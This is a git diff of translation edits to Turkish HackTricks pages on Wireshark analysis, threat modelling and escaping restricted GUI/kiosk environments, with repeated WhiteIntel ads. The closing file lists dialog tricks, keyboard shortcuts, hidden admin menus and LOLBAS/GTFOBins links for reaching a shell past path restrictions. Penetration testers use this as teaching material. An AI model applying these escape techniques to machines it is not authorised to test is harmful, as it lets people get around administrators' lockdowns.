WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Wireshark becerilerinizi geliştirin
|
||||
|
||||
### Eğitimler
|
||||
|
||||
Aşağıdaki eğitimler bazı harika temel ipuçları öğrenmek için harikadır:
|
||||
Aşağıdaki eğitimler, bazı harika temel ipuçları öğrenmek için harikadır:
|
||||
|
||||
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
|
||||
|
@ -31,13 +43,13 @@ Aşağıdaki eğitimler bazı harika temel ipuçları öğrenmek için harikadı
|
|||
|
||||
**Uzman Bilgiler**
|
||||
|
||||
_Analyze_ --> _Expert Information_ üzerine tıkladığınızda, **analiz edilen** paketlerde neler olduğuna dair bir **genel bakış** elde edersiniz:
|
||||
_Analyze_ --> **Expert Information**'a tıklayarak **analiz edilen** paketlerde neler olduğuna dair bir **genel bakış** elde edersiniz:
|
||||
|
||||
![](<../../../.gitbook/assets/image (253).png>)
|
||||
|
||||
**Çözülen Adresler**
|
||||
|
||||
_Statistics --> Çözülen Adresler_ altında, wireshark tarafından çözülen birçok **bilgiyi** bulabilirsiniz, örneğin port/taşıma protokolüne, MAC adresinden üreticiye vb. İletişimde neyin etkilendiğini bilmek ilginçtir.
|
||||
_Statistics --> Çözülen Adresler_ altında, wireshark tarafından **çözülen** birçok **bilgiyi** bulabilirsiniz, örneğin port/taşıma protokolüne, MAC adresinden üreticiye vb. İletişimde neyin etkilendiğini bilmek ilginçtir.
|
||||
|
||||
![](<../../../.gitbook/assets/image (890).png>)
|
||||
|
||||
|
@ -67,7 +79,7 @@ _Statistics --> DNS_ altında, yakalanan DNS isteği hakkında istatistikler bul
|
|||
|
||||
**I/O Grafik**
|
||||
|
||||
_Statistics --> I/O Grafik_ altında, bir **iletişim grafiğini** bulabilirsiniz.
|
||||
_Statistics --> I/O Grafik_ altında, iletişimin bir **grafikini** bulabilirsiniz.
|
||||
|
||||
![](<../../../.gitbook/assets/image (989).png>)
|
||||
|
||||
|
@ -85,7 +97,7 @@ Diğer ilginç filtreler:
|
|||
|
||||
### Arama
|
||||
|
||||
Oturumların paketlerindeki **içerik** için **arama** yapmak istiyorsanız _CTRL+f_ tuşuna basın. Ana bilgi çubuğuna yeni katmanlar ekleyebilirsiniz (No., Zaman, Kaynak, vb.) sağ tıkladıktan sonra sütunu düzenleyerek.
|
||||
Oturumların paketlerindeki **içeriği aramak** istiyorsanız _CTRL+f_ tuşuna basın. Ana bilgi çubuğuna yeni katmanlar ekleyebilirsiniz (No., Zaman, Kaynak, vb.) sağ tıkladıktan sonra sütunu düzenleyerek.
|
||||
|
||||
### Ücretsiz pcap laboratuvarları
|
||||
|
||||
|
@ -93,7 +105,7 @@ Oturumların paketlerindeki **içerik** için **arama** yapmak istiyorsanız _CT
|
|||
|
||||
## Alanları Tanımlama
|
||||
|
||||
HTTP başlığı Host'u gösteren bir sütun ekleyebilirsiniz:
|
||||
Host HTTP başlığını gösteren bir sütun ekleyebilirsiniz:
|
||||
|
||||
![](<../../../.gitbook/assets/image (635).png>)
|
||||
|
||||
|
@ -125,7 +137,7 @@ _Düzenle_ düğmesine basın ve sunucunun ve özel anahtarın tüm verilerini e
|
|||
|
||||
### Simetrik oturum anahtarları ile https trafiğini çözme
|
||||
|
||||
Hem Firefox hem de Chrome, Wireshark'ın TLS trafiğini çözmek için kullanabileceği TLS oturum anahtarlarını kaydetme yeteneğine sahiptir. Bu, güvenli iletişimin detaylı analizine olanak tanır. Bu şifre çözümünü nasıl gerçekleştireceğinizle ilgili daha fazla bilgiye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/) adresindeki bir kılavuzda bulunabilir.
|
||||
Hem Firefox hem de Chrome, Wireshark'ın TLS trafiğini çözmek için kullanabileceği TLS oturum anahtarlarını kaydetme yeteneğine sahiptir. Bu, güvenli iletişimin detaylı analizine olanak tanır. Bu şifre çözümünü nasıl gerçekleştireceğinizle ilgili daha fazla bilgiyi [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/) rehberinde bulabilirsiniz.
|
||||
|
||||
Bunu tespit etmek için ortam içinde `SSLKEYLOGFILE` değişkenini arayın
|
||||
|
||||
|
@ -133,13 +145,12 @@ Paylaşılan anahtarlar dosyası şuna benzer olacaktır:
|
|||
|
||||
![](<../../../.gitbook/assets/image (817).png>)
|
||||
|
||||
Bunu wireshark'a içe aktarmak için \_düzenle > tercih > protokol > ssl > ve (Pre)-Master-Secret log dosya adına içe aktarın:
|
||||
Bunu Wireshark'a içe aktarmak için \_düzenle > tercih > protokol > ssl > gidin ve (Ön)-Anahtar-Gizli günlük dosya adına içe aktarın:
|
||||
|
||||
![](<../../../.gitbook/assets/image (986).png>)
|
||||
## ADB iletişimi
|
||||
|
||||
## ADB ile iletişim
|
||||
|
||||
APK'nın gönderildiği bir ADB iletişiminden APK çıkarma:
|
||||
APK'nın gönderildiği bir ADB iletişiminden APK çıkarın:
|
||||
```python
|
||||
from scapy.all import *
|
||||
|
||||
|
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
|
|||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
# Tehdit Modelleme
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketlerin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılım saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -16,11 +16,11 @@ Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Tehdit Modelleme
|
||||
|
||||
Tehdit Modelleme konusunda HackTricks'in kapsamlı kılavuzuna hoş geldiniz! Bu kritik siber güvenlik yönünü keşfetmeye başlayın, burada bir sistemdeki potansiyel zayıflıkları tanımlayarak, anlayarak ve stratejik bir şekilde karşı önlemler alarak savaşırız. Bu konu, gerçek dünya örnekleri, yardımcı yazılımlar ve anlaşılması kolay açıklamalarla dolu adım adım bir rehber olarak hizmet verir. Hem acemiler hem de siber güvenlik savunmalarını güçlendirmek isteyen deneyimli uygulayıcılar için idealdir.
|
||||
Tehdit Modelleme konusunda HackTricks'in kapsamlı kılavuzuna hoş geldiniz! Bu kritik siber güvenlik yönünü keşfetmeye başlayın, burada bir sistemin potansiyel zayıflıklarını tanımlayarak, anlayarak ve stratejik bir şekilde karşı önlemler alarak mücadele ediyoruz. Bu konu adım adım rehber, gerçek dünya örnekleri, yardımcı yazılımlar ve anlaşılması kolay açıklamalarla doludur. Hem acemiler hem de deneyimli uygulayıcılar için idealdir ve siber güvenlik savunmalarını güçlendirmeyi amaçlar.
|
||||
|
||||
### Sıkça Kullanılan Senaryolar
|
||||
|
||||
1. **Yazılım Geliştirme**: Güvenli Yazılım Geliştirme Yaşam Döngüsü (SSDLC) parçası olarak, tehdit modelleme, geliştirme sürecinin erken aşamalarında **potansiyel zayıflık kaynaklarını belirlemede** yardımcı olur.
|
||||
1. **Yazılım Geliştirme**: Güvenli Yazılım Geliştirme Yaşam Döngüsü (SSDLC) bir parçası olarak, tehdit modelleme, geliştirme aşamalarının erken aşamalarında **potansiyel zayıflık kaynaklarını belirlemede** yardımcı olur.
|
||||
2. **Sızma Testi**: Sızma Testi Yürütme Standartı (PTES) çerçevesi, testi gerçekleştirmeden önce sistemin zayıflıklarını anlamak için **tehdit modellemeyi** gerektirir.
|
||||
|
||||
### Tehdit Modeli Özeti
|
||||
|
@ -31,28 +31,28 @@ Tehdit modelleri genellikle potansiyel zayıflıkları, riskleri veya engelleri
|
|||
|
||||
### CIA Üçlüsü
|
||||
|
||||
CIA Üçlüsü, bilgi güvenliği alanında geniş kabul gören bir modeldir ve Gizlilik, Bütünlük ve Erişilebilirlik anlamına gelir. Bu üç ilke, tehdit modelleme metodolojileri de dahil olmak üzere birçok güvenlik önlemi ve politikasının temelini oluşturur.
|
||||
CIA Üçlüsü, bilgi güvenliği alanında geniş kabul gören bir model olup Gizlilik, Bütünlük ve Erişilebilirlik anlamına gelir. Bu üç ilke, birçok güvenlik önlemi ve politikasının temelini oluşturur ve tehdit modelleme metodolojilerini içerir.
|
||||
|
||||
1. **Gizlilik**: Verinin veya sistemin yetkisiz kişiler tarafından erişilmesini engellemek. Bu, veri ihlallerini önlemek için uygun erişim kontrolleri, şifreleme ve diğer önlemleri gerektiren güvenliğin merkezi bir yönüdür.
|
||||
2. **Bütünlük**: Verinin yaşam döngüsü boyunca doğruluğu, tutarlılığı ve güvenilirliği. Bu ilke, verinin yetkisiz kişiler tarafından değiştirilmemesini veya değiştirilmemesini sağlar. Genellikle, kontrol toplamları, karma işlemleri ve diğer veri doğrulama yöntemlerini içerir.
|
||||
1. **Gizlilik**: Verinin veya sistemin yetkisiz kişiler tarafından erişilmediğinden emin olma. Bu, veri ihlallerini önlemek için uygun erişim kontrolleri, şifreleme ve diğer önlemleri gerektiren güvenliğin merkezi bir yönüdür.
|
||||
2. **Bütünlük**: Verinin yaşam döngüsü boyunca doğruluğu, tutarlılığı ve güvenilirliği. Bu ilke, verinin yetkisiz kişiler tarafından değiştirilmediğinden veya bozulmadığından emin olur. Genellikle kontrol toplamları, karma işlemleri ve diğer veri doğrulama yöntemlerini içerir.
|
||||
3. **Erişilebilirlik**: Veri ve hizmetlerin ihtiyaç duyulduğunda yetkili kullanıcılara erişilebilir olmasını sağlar. Bu genellikle sistemlerin kesintilere karşı çalışmasını sağlamak için yedeklilik, hata toleransı ve yüksek erişilebilirlik yapılandırmalarını içerir.
|
||||
|
||||
### Tehdit Modelleme Metodolojileri
|
||||
|
||||
1. **STRIDE**: Microsoft tarafından geliştirilen STRIDE, **Sahtecilik, Bozulma, Reddiye, Bilgi Açıklaması, Hizmet Reddi ve Ayrıcalık Yükseltme** anlamına gelen bir kısaltmadır. Her kategori bir tehdit türünü temsil eder ve bu metodoloji, potansiyel tehditleri belirlemek için bir programın veya sistemin tasarım aşamasında yaygın olarak kullanılır.
|
||||
2. **DREAD**: Bu, Microsoft'un belirtilen tehditlerin risk değerlendirmesi için kullandığı başka bir metodolojidir. DREAD, **Hasar Potansiyeli, Tekrarlanabilirlik, Sömürülebilirlik, Etkilenen Kullanıcılar ve Keşfedilebilirlik** anlamına gelir. Bu faktörlerin her biri puanlanır ve sonuç, belirlenen tehditleri önceliklendirmek için kullanılır.
|
||||
2. **DREAD**: Bu, Microsoft'un tanımlanan tehditlerin risk değerlendirmesi için kullandığı başka bir metodolojidir. DREAD, **Zarar Potansiyeli, Tekrarlanabilirlik, Sömürülebilirlik, Etkilenen Kullanıcılar ve Keşfedilebilirlik** anlamına gelir. Bu faktörlerden her biri puanlanır ve sonuç, belirlenen tehditleri önceliklendirmek için kullanılır.
|
||||
3. **PASTA** (Saldırı Simülasyonu ve Tehdit Analizi İçin Süreç): Bu, yedi adımlı, **risk-odaklı** bir metodolojidir. Güvenlik hedeflerini tanımlama ve belirleme, teknik kapsam oluşturma, uygulama ayrıştırma, tehdit analizi, zayıflık analizi ve risk/değerlendirme değerlendirmesini içerir.
|
||||
4. **Trike**: Bu, varlıkları savunmaya odaklanan bir risk tabanlı metodolojidir. Risk yönetimi perspektifinden başlar ve tehditlere ve zayıflıklara bu bağlamda bakar.
|
||||
5. **VAST** (Görsel, Çevik ve Basit Tehdit Modelleme): Bu yaklaşım, daha erişilebilir olmayı amaçlar ve Agile geliştirme ortamlarına entegre olur. Diğer metodolojilerden öğeleri birleştirir ve **tehditlerin görsel temsillerine** odaklanır.
|
||||
4. **Trike**: Bu, varlıkları savunmaya odaklanan risk tabanlı bir metodolojidir. Risk yönetimi perspektifinden başlar ve tehditlere ve zayıflıklara bu bağlamda bakar.
|
||||
5. **VAST** (Görsel, Çevik ve Basit Tehdit Modelleme): Bu yaklaşım, daha erişilebilir olmayı amaçlar ve Agile geliştirme ortamlarına entegre olur. Diğer metodolojilerden unsurları birleştirir ve **tehditlerin görsel temsillerine** odaklanır.
|
||||
6. **OCTAVE** (Operasyonel Kritik Tehdit, Varlık ve Zayıflık Değerlendirmesi): CERT Koordinasyon Merkezi tarafından geliştirilen bu çerçeve, **örgütsel risk değerlendirmesine** odaklanır, belirli sistemler veya yazılımlar yerine.
|
||||
|
||||
## Araçlar
|
||||
|
||||
Tehdit modellerinin oluşturulması ve yönetilmesine yardımcı olabilecek birkaç araç ve yazılım çözümü mevcuttur. Düşünebileceğiniz birkaç tanesi şunlardır.
|
||||
Tehdit modellerinin oluşturulması ve yönetilmesine yardımcı olabilecek birkaç araç ve yazılım çözümü mevcuttur. Düşünebileceğiniz birkaçı şunlardır.
|
||||
|
||||
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
|
||||
|
||||
Siber güvenlik uzmanları için gelişmiş çapraz platform ve çok özellikli GUI web örümceği / tarayıcı olan Spider Suite, saldırı yüzeyi haritalama ve analizi için kullanılabilir.
|
||||
Siber güvenlik uzmanları için gelişmiş çapraz platform ve çok özellikli GUI web örümcek/crawler olan Spider Suite, saldırı yüzeyi haritalama ve analizi için kullanılabilir.
|
||||
|
||||
**Kullanım**
|
||||
|
||||
|
@ -64,9 +64,9 @@ Siber güvenlik uzmanları için gelişmiş çapraz platform ve çok özellikli
|
|||
|
||||
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_2.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### [OWASP Tehdit Ejderi](https://github.com/OWASP/threat-dragon/releases)
|
||||
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
|
||||
|
||||
OWASP'tan açık kaynaklı bir proje olan Tehdit Ejderi, sistem diyagramlamasını ve tehditleri/önlemleri otomatik olarak oluşturmak için bir kural motorunu içeren hem web hem de masaüstü uygulamasıdır.
|
||||
OWASP'den açık kaynaklı bir proje olan Threat Dragon, sistem diyagramlamayı ve tehditlerin/önlemlerin otomatik olarak oluşturulmasını sağlayan bir kural motorunu içeren hem web hem de masaüstü uygulamasıdır.
|
||||
|
||||
**Kullanım**
|
||||
|
||||
|
@ -88,7 +88,7 @@ Bazen şöyle görünebilir:
|
|||
|
||||
4. Modelinizi Oluşturun
|
||||
|
||||
SpiderSuite Tarayıcı gibi araçları kullanarak ilham alabilirsiniz, temel bir model şöyle görünebilir
|
||||
SpiderSuite Crawler gibi araçları kullanarak ilham alabilirsiniz, temel bir model şöyle görünebilir
|
||||
|
||||
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -98,25 +98,25 @@ Varlıklar hakkında biraz açıklama:
|
|||
* Aktör (Web Sitesi Ziyaretçisi, Kullanıcı veya Yönetici gibi bir Kişi)
|
||||
* Veri Akış Hattı (Etkileşimin Göstergesi)
|
||||
* Güven Sınırı (Farklı ağ segmentleri veya kapsamları.)
|
||||
* Depolama (Verilerin depolandığı şeyler, veritabanları gibi)
|
||||
* Depolama (Verilerin depolandığı şeyler, örneğin Veritabanları)
|
||||
|
||||
5. Tehdit Oluşturun (Adım 1)
|
||||
|
||||
Önce bir tehdit eklemek istediğiniz katmanı seçmelisiniz
|
||||
Önce tehdit eklemek istediğiniz katmanı seçmelisiniz
|
||||
|
||||
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Şimdi tehdidi oluşturabilirsiniz
|
||||
Şimdi tehdit oluşturabilirsiniz
|
||||
|
||||
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Aktör Tehditleri ve İşlem Tehditleri arasında bir fark olduğunu unutmayın. Bir Tehdit eklemek isterseniz yalnızca "Sahtecilik" ve "Reddiye" seçeneklerini seçebileceksiniz. Ancak örneğimizde bir İşlem varlığına bir tehdit ekliyoruz, bu nedenle tehdit oluşturma kutusunda bunu göreceğiz:
|
||||
Aktör Tehditleri ve İşlem Tehditleri arasında bir fark olduğunu unutmayın. Bir Tehdit eklemek isterseniz yalnızca "Sahtecilik" ve "Reddiye" seçeneklerini seçebileceksiniz. Ancak örneğimizde bir İşlem varlığına bir tehdit ekliyoruz, bu yüzden tehdit oluşturma kutusunda bunu göreceğiz:
|
||||
|
||||
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
6. Tamam
|
||||
|
||||
Artık bitmiş modeliniz böyle görünebilir. Ve işte OWASP Tehdit Ejderi ile basit bir tehdit modeli nasıl oluşturulur.
|
||||
Artık bitmiş modeliniz bu şekilde görünebilir. Ve işte OWASP Threat Dragon ile basit bir tehdit modeli nasıl oluşturulur.
|
||||
|
||||
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
|
||||
### [Microsoft Tehdit Modelleme Aracı](https://aka.ms/threatmodelingtool)
|
||||
|
@ -124,11 +124,11 @@ Artık bitmiş modeliniz böyle görünebilir. Ve işte OWASP Tehdit Ejderi ile
|
|||
Bu, yazılım projelerinin tasarım aşamasında tehditleri bulmaya yardımcı olan Microsoft'tan ücretsiz bir araçtır. STRIDE metodolojisini kullanır ve özellikle Microsoft'un yığınında geliştirme yapanlar için uygundur.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehdit edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**]'ni edinin (https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**]'in koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubumuza**](https://discord.gg/hRep4RUj7f) veya [**telegram grubumuza**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**]'da takip edin (https://twitter.com/hacktricks_live)**.**
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**] (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**] (https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -28,7 +28,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
# GUI uygulaması içinde olası eylemleri kontrol et
|
||||
|
||||
**Ortak Diyaloglar** dosya kaydetme, dosya açma, yazı tipi seçme, renk seçme gibi seçeneklerdir... Çoğu, tam bir Gezgin işlevselliği sunacaktır. Bu, şu seçeneklere erişebilirseniz Gezgin işlevlerine erişebileceğiniz anlamına gelir:
|
||||
**Ortak Diyaloglar** dosya kaydetme, dosya açma, yazı tipi seçme, renk seçme gibi seçeneklerdir... Çoğu, **tam bir Gezgin işlevselliği sunacaktır**. Bu, şu seçeneklere erişebilirseniz Gezgin işlevselliğine erişebileceğiniz anlamına gelir:
|
||||
|
||||
* Kapat/Kapat olarak
|
||||
* Aç/Aç ile
|
||||
|
@ -50,7 +50,7 @@ Belki de **`Aç ile`** seçeneğini kullanarak bir tür kabuk açabilir/çalış
|
|||
|
||||
### Windows
|
||||
|
||||
Örneğin _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ burada kullanılabilecek komutları yürütmek için daha fazla ikili dosya bulun: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
Örneğin _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ burada kullanılabilecek daha fazla ikili dosyayı bulun: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
|
||||
### \*NIX __
|
||||
|
||||
|
@ -58,14 +58,14 @@ _bash, sh, zsh..._ Daha fazlası burada: [https://gtfobins.github.io/](https://g
|
|||
|
||||
# Windows
|
||||
|
||||
## Yol Kısıtlamalarını Atlatma
|
||||
## Yol kısıtlamalarını atlatma
|
||||
|
||||
* **Ortam değişkenleri**: Bazı yollara işaret eden birçok ortam değişkeni vardır
|
||||
* **Çevresel değişkenler**: Bazı yollara işaret eden birçok çevresel değişken vardır
|
||||
* **Diğer protokoller**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
|
||||
* **Sembolik bağlantılar**
|
||||
* **Kısayollar**: CTRL+N (yeni oturum aç), CTRL+R (Komutları Yürüt), CTRL+SHIFT+ESC (Görev Yöneticisi), Windows+E (gezgini aç), CTRL-B, CTRL-I (Favoriler), CTRL-H (Geçmiş), CTRL-L, CTRL-O (Dosya/Aç Diyalogu), CTRL-P (Yazdırma Diyalogu), CTRL-S (Farklı Kaydet)
|
||||
* **Kısayollar**: CTRL+N (yeni oturum aç), CTRL+R (Komutları Yürüt), CTRL+SHIFT+ESC (Görev Yöneticisi), Windows+E (gezgini aç), CTRL-B, CTRL-I (Favoriler), CTRL-H (Geçmiş), CTRL-L, CTRL-O (Dosya/Açma Diyalogu), CTRL-P (Yazdırma Diyalogu), CTRL-S (Farklı Kaydet)
|
||||
* Gizli Yönetici menüsü: CTRL-ALT-F8, CTRL-ESC-F9
|
||||
